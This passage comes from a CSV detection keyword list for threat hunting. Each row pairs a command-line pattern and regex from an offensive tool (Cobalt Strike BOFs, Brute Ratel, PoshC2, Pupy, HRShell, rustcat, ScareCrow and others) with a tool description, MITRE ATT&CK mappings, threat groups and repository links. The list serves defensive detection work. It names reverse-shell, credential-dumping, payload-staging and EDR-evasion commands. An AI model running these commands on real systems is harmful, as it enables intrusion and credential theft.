T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","powershell\.exe\s\-nop\s\-c\s\""start\-job\s.{0,1000}Import\-Module\sBitsTransfer.{0,1000}\$env\:temp.{0,1000}GetRandomFileName\(\).{0,1000}Start\-BitsTransfer\s\-Source\s\'http.{0,1000}Remove\-Item.{0,1000}Receive\-Job.{0,1000}","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "ps_ex 
*","ps_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "psgrep *","psgrep\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "pupysh","pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "python3 start_campaign.py","python3\sstart_campaign\.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "rcat listen *","rcat\slisten\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "RedGuard -*","RedGuard\s\-.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "remotereg *","remotereg\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "rev2self*","rev2self.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "runof *.o*","runof\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "runpe *.exe*","runpe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - 
T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "samdump *","samdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "ScareCrow -*","ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "scrun.exe *","scrun\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "set shellcode *","set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "set_child *.exe","set_child\s.{0,1000}\.exe","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "sh_executor *","sh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "sharescan 
*.txt","sharescan\s.{0,1000}\.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "shell.exe -u http://*","shell\.exe\s\-u\shttp\:\/\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "ShellCmd *","ShellCmd\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "show shellcodes","show\sshellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "SigFlip *","SigFlip\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "SigFlip *.exe*","SigFlip\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "sleeper force","sleeper\sforce","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper off","sleeper\soff","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper on","sleeper\son","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sniffer -*","sniffer\s\-.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "spawn *.exe *.bin*","spawn\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "SprayAD * * ","SprayAD\s.{0,1000}\s.{0,1000}\s","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "sudomy -*","sudomy\s\-.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" 
"SwampThing.csproj","SwampThing\.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "TokenStrip *","TokenStrip\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "token-vault 
create*","token\-vault\screate.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault remove*","token\-vault\sremove.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 